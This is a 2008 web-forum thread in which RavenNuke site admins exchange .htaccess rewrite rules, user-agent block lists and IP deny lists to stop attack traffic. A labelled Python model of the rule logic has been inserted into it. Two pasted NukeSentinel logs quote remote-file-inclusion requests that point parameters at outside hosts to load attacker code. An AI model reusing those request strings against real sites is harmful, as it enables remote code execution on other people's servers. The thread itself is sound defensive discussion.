Ravens PHP Scripts: Forums
 

 

webservant
Worker
Worker



Joined: Feb 26, 2006
Posts: 206
Location: Springfield, MA

Posted: Sat Feb 02, 2008 6:16 pm

I'm currently running RN 2.10.01. Lately (like for the past month), Nuke Sentinel has been blocking about a dozen Abuse-Filter (see below) attempts per day. They all contain TotalCalendar which is a module that I used to have but has been gone for several months. My concern is that whoever this is continues to permanently block IP on a variety of subnets. Is there any way to catch and redirect the URL via .htaccess before it hits Nuke Sentinel?

Thanks for considering the problem and helping me with the solution...

Here's the ban email:
Code:
Date & Time: 2008-02-02 18:23:30 EST GMT -0500

Blocked IP: 71.192.149.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11
Query String: www.graciouscall.org/modules.php?name=TotalCalendar//modules/TotalCalendar/about.php?inc_dir=http://www.gilmores.ie/modules/di
Get String: www.graciouscall.org/modules.php?name=TotalCalendar//modules/TotalCalendar/about.php?inc_dir=http://www.gilmores.ie/modules/di
Post String: www.graciouscall.org/modules.php
Forwarded For: none
Client IP: none
Remote Address: 71.192.149.248
Remote Port: 63224
Request Method: GET
--------------------
Who-Is for IP


_________________
Awaiting His Shout
Webservant - GraciousCall.org
Romans 8:28-39 
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

Posted: Sat Feb 02, 2008 8:20 pm

While there are some more generic HTTP blocking ones, here's a more specific one I use:
Code:


RewriteCond %{THE_REQUEST}   (inc_dir)
RewriteRule ^.*$ http://127.0.0.1 [L]

sowsteady
Regular
Regular



Joined: Apr 09, 2004
Posts: 87
Location: UK

Posted: Sun Feb 03, 2008 5:41 am

Evaders, based on a previous post here on another thread, I changed mine to the following :-

Code:



RewriteCond %{QUERY_STRING} \.ru
RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [OR]
RewriteCond %{HTTP_USER_AGENT} ^NaverBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^Twiceler [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Yeti [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus [OR]
RewriteRule ^.*$ http://127.0.0.1 [R,L]



deny from 69.90.135
deny from 69.94.10
deny from 66.160.143
deny from 75.125.48
deny from 67.19.49
deny from 62.193.230
deny from 72.32.58
deny from 130.225.62
deny from 69.61.61
deny from 217.11.251
deny from 208.75.227
deny from 216.227.209
deny from 85.12.13
deny from 64.185.237
deny from 81.169.174
deny from 84.40.222
deny from 210.114.223
deny from 68.157.122
deny from 85.126.175
deny from 75.0.141
deny from 24.222.5
deny from 69.20.67
deny from 209.50.244
deny from 204.15.198
deny from 204.10.55
deny from 71.86.32
deny from 64.251.21
deny from 209.51.212
deny from 60.244.114


Despite this I am also getting at least a dozen similar "attacks" loading up my email inbox. Where would I place the code you suggest above and should I just use the one you posted or add it to mine above?

I really need to learn this htaccess thing. Rolling Eyes


Last edited by sowsteady on Sun Feb 03, 2008 5:43 am; edited 2 times in total 
webservant







Posted: Sun Feb 03, 2008 5:42 am

So, I assume that you place this at the top of the .htaccess in the root of the site, and it catches any incoming request having "inc_dir" - as this is a construct never used in RN. Very cool! Thanks!
 
webservant







Posted: Sun Feb 03, 2008 5:55 am

That works wonderfully! Thank you so much.
Taking a hint from an IBM support friend, I modified the code slightly:

Code:


RewriteCond %{THE_REQUEST}   (inc_dir)
RewriteRule ^.*$ http://127.0.0.1/get-a-life [L]
 
Gremmie
Former Moderator in Good Standing



Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA

Posted: Sun Feb 03, 2008 7:26 am

sowsteady, do you have a RewriteEngine On statement?

sowsteady







Posted: Sun Feb 03, 2008 11:13 am

Gremmie wrote:
sowsteady, do you have a RewriteEngine On statement?


Oops! No I think, the one I posted above is exactly how I have it.

I guess I need to add "RewriteEngine On" at the beginning?
 
evaders99







Posted: Sun Feb 03, 2008 9:43 pm

You can continue to add RewriteCond rules together. Just use the [OR] mark after the rule
 
sowsteady







Posted: Mon Feb 04, 2008 3:09 am

Evaders, thanks, so I need to have something like ...

RewriteCond ON
RewriteCond %{QUERY_STRING} \.ru [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]
...
..


Is this right?
 
webservant







Posted: Mon Feb 04, 2008 6:24 am

You want to turn the rewrite engine (mod_rewrite) on, and I've never seen NC,OR in rewrite conditions. I'd write it this way:
Code:
RewriteEngine ON

RewriteCond %{QUERY_STRING} \.ru [OR]
RewriteCond %{HTTP_USER_AGENT} ^Java [OR]
...
RewriteRule ^.*$ http://127.0.0.1/get-a-life [L]
 
sowsteady







Posted: Mon Feb 04, 2008 7:29 am

webservant wrote:
You want to turn the rewrite engine (mod_rewrite) on, and I've never seen NC,OR in rewrite conditions. I'd write it this way:
Code:
RewriteEngine ON

RewriteCond %{QUERY_STRING} \.ru [OR]
RewriteCond %{HTTP_USER_AGENT} ^Java [OR]
...
RewriteRule ^.*$ http://127.0.0.1/get-a-life [L]


webservant, thanks. I'm going to try it because whatever I have now definitely is not quite right.
 
evaders99







Posted: Mon Feb 04, 2008 9:46 am

[NC] is just a tag meaning no case sensitivity. You can always include it to capture all case variations
 
webservant







Posted: Mon Feb 04, 2008 4:31 pm

Thanks for clearing my misperception.
 
bobbyg
Worker
Worker



Joined: Dec 05, 2007
Posts: 212
Location: Tampa, Florida

Posted: Tue Feb 05, 2008 2:39 pm

I placed this in the htaccess but found server error in the who-is-where block.

webservant wrote:
I'd write it this way:
Code:
RewriteEngine ON

RewriteCond %{QUERY_STRING} \.ru [OR]
RewriteCond %{HTTP_USER_AGENT} ^Java [OR]
...
RewriteRule ^.*$ http://127.0.0.1/get-a-life [L]
 
fondy
Regular
Regular



Joined: Sep 12, 2003
Posts: 63

Posted: Thu Feb 07, 2008 1:52 am

Hi. I have problems with libwww-perl. In .htaccess I have this:

Code:
Options All -Indexes

DirectoryIndex index.php index.htm index.html

# -------------------------------------------
# Start of NukeSentinel(tm) admin.php Auth
# -------------------------------------------
<Files .ftaccess>
  deny from all
</Files>

<Files .staccess>
  deny from all
</Files>

# -----------------------------------------------------------------------------------------------------
# Leave this block commented out unless HTTPAuth is NOT available in your NukeSentinel(tm) Admin Panel.
# This code is mainly for use with CGI Authentication and most servers do not require it.
# -----------------------------------------------------------------------------------------------------
# <Files admin.php>
#    <Limit GET POST PUT>
#       require valid-user
#    </Limit>
#    AuthName "Restricted"
#    AuthType Basic
#   AuthUserFile /path/to/your/.staccess
# </Files>
# -----------------------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------------------

RewriteEngine on
RewriteCond %{QUERY_STRING} \.ru
RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NaverBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^Twiceler [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Yeti [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.*$ http://127.0.0.1 [R,L]
RewriteEngine off

# -------------------------------------------
# Start of NukeSentinel(tm) DENY FROM area
# -------------------------------------------



But it seems that libwww-perl is not stopped by htaccess, because sentinel reports:

Code:
Date & Time: 2008-02-07 03:48:07 CET GMT +0100

Blocked IP: 66.135.60.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: libwww-perl/5.79
Query String:
xxx.no/index.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt??
Get String:
xxx.no/index.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt??
Post String: xxx.no/index.php
Forwarded For: none
Client IP: none
Remote Address: 66.135.60.137
Remote Port: 51990
Request Method: GET
--------------------
Who-Is for IP


Do I have something wrong in my htaccess file?

regards fondy
 
montego
Site Admin



Joined: Aug 29, 2004
Posts: 9457
Location: Arizona

Posted: Thu Feb 07, 2008 7:05 am

Your first RewriteCond line doesn't have the [OR] in it... Wink

fondy







Posted: Thu Feb 07, 2008 7:14 am

Thx montego, I will change it and try Smile
 
fondy







Posted: Tue Feb 19, 2008 2:30 am

Hi

Instead of using rewrite to block, can this be an idea to include in htaccess :

Code:
SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot

SetEnvIfNoCase User-Agent "^Baiduspider" bad_bot
SetEnvIfNoCase User-Agent "^BatchFTP" bad_bot
SetEnvIfNoCase User-Agent "^Bigfoot" bad_bot
SetEnvIfNoCase User-Agent "^Black.Hole" bad_bot
 
Order Allow,Deny
Allow from All
Deny from env=bad_bot


I have trouble with the libwww-perl user agent, because it is not stopped in htaccess. Have these in htaccess:

Code:
Options All -Indexes

DirectoryIndex index.php index.htm index.html

# -------------------------------------------
# Start of NukeSentinel(tm) admin.php Auth
# -------------------------------------------
<Files .ftaccess>
  deny from all
</Files>

<Files .staccess>
  deny from all
</Files>

# -----------------------------------------------------------------------------------------------------
# Leave this block commented out unless HTTPAuth is NOT available in your NukeSentinel(tm) Admin Panel.
# This code is mainly for use with CGI Authentication and most servers do not require it.
# -----------------------------------------------------------------------------------------------------
# <Files admin.php>
#    <Limit GET POST PUT>
#       require valid-user
#    </Limit>
#    AuthName "Restricted"
#    AuthType Basic
#   AuthUserFile /path/to/your/.staccess
# </Files>
# -----------------------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------------------
RewriteEngine ON
RewriteCond %{QUERY_STRING} \.ru [OR]
RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NaverBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^Twiceler [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Yeti [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^Opera [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.*$ http://127.0.0.1 [R,L]
RewriteEngine OFF

# -------------------------------------------
# Start of NukeSentinel(tm) DENY FROM area
# -------------------------------------------


regards fondy
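
Added example (not part of any post in this thread): a simplified Python model of how mod_rewrite chains RewriteCond lines, run on abridged copies of the Feb 07 and Feb 19 rule sets above and on the libwww-perl request from the NukeSentinel report. The `FIXED` variant, the browser request and all function names are assumptions made here; the model also treats the last `RewriteEngine` directive in the file as the one in effect.

```python
import re

def parse_htaccess(text):
    """Return (engine_on, rules); each rule is the list of RewriteCond tuples
    (variable, pattern, flags) that precede one RewriteRule."""
    engine_on, conds, rules = False, [], []
    for line in text.splitlines():
        # Split on whitespace, but not on the escaped "\ " used inside patterns.
        parts = re.split(r"(?<!\\)\s+", line.strip())
        name = parts[0].lower()
        if name == "rewriteengine":
            # Modelled as one setting per file: a later directive overrides an earlier one.
            engine_on = parts[1].lower() == "on"
        elif name == "rewritecond":
            flags = set(parts[3].strip("[]").upper().split(",")) if len(parts) > 3 else set()
            conds.append((parts[1], parts[2], flags))
        elif name == "rewriterule":
            rules.append(conds)   # the rule pattern ^.*$ matches every path, so it is ignored
            conds = []
    return engine_on, rules

def conds_match(conds, request):
    """Chain conditions: implicit AND, with [OR] joining a condition to the next one."""
    i = 0
    while i < len(conds):
        var, pattern, flags = conds[i]
        hit = re.search(pattern, request.get(var, ""), re.I if "NC" in flags else 0) is not None
        if "OR" in flags:
            if hit:
                # One alternative matched: skip the rest of this OR chain,
                # including the condition that closes it.
                while i < len(conds) and "OR" in conds[i][2]:
                    i += 1
        elif not hit:
            return False          # a failed AND-ed condition vetoes the rule
        i += 1
    return True

def diagnose(htaccess, request):
    """Return (engine_on, conditions_match); the redirect happens only if both are True."""
    engine_on, rules = parse_htaccess(htaccess)
    return engine_on, any(conds_match(c, request) for c in rules)

# Abridged from the rule sets posted in the thread (most user-agent lines left out).
UA_CONDS = r"""RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.*$ http://127.0.0.1 [R,L]
"""

def build(first_cond, trailer):
    return "RewriteEngine on\n" + first_cond + "\n" + UA_CONDS + trailer

FEB_07 = build(r"RewriteCond %{QUERY_STRING} \.ru", "RewriteEngine off\n")
FEB_19 = build(r"RewriteCond %{QUERY_STRING} \.ru [OR]", "RewriteEngine OFF\n")
FIXED = build(r"RewriteCond %{QUERY_STRING} \.ru [OR]", "")   # assumption: trailing "off" removed

# Request taken from the NukeSentinel report above.
PROBE = {
    "%{HTTP_USER_AGENT}": "libwww-perl/5.79",
    "%{QUERY_STRING}": "phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt??",
}
# Constructed sample of an ordinary visitor.
BROWSER = {
    "%{HTTP_USER_AGENT}": "Mozilla/5.0 (X11; U; Linux i686; en-US) Firefox/2.0.0.11",
    "%{QUERY_STRING}": "name=News",
}

if __name__ == "__main__":
    for label, cfg in (("Feb 07", FEB_07), ("Feb 19", FEB_19), ("fixed", FIXED)):
        print(label, "probe:", diagnose(cfg, PROBE), "browser:", diagnose(cfg, BROWSER))
```

In this model the Feb 07 file fails on both counts, the Feb 19 file has matching conditions but the engine is off, and only the variant without the trailing `RewriteEngine off` redirects the probe while leaving the browser request alone.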
 
fondy







Posted: Thu Feb 21, 2008 4:16 am

If ModRewrite is not available, use this:

Code:
SetEnvIfNoCase user-agent "^Java" bad_bot

SetEnvIfNoCase user-agent "^LWP" bad_bot
SetEnvIfNoCase user-agent "^lwp-trivial" bad_bot
SetEnvIfNoCase user-agent "^libwww-perl" bad_bot
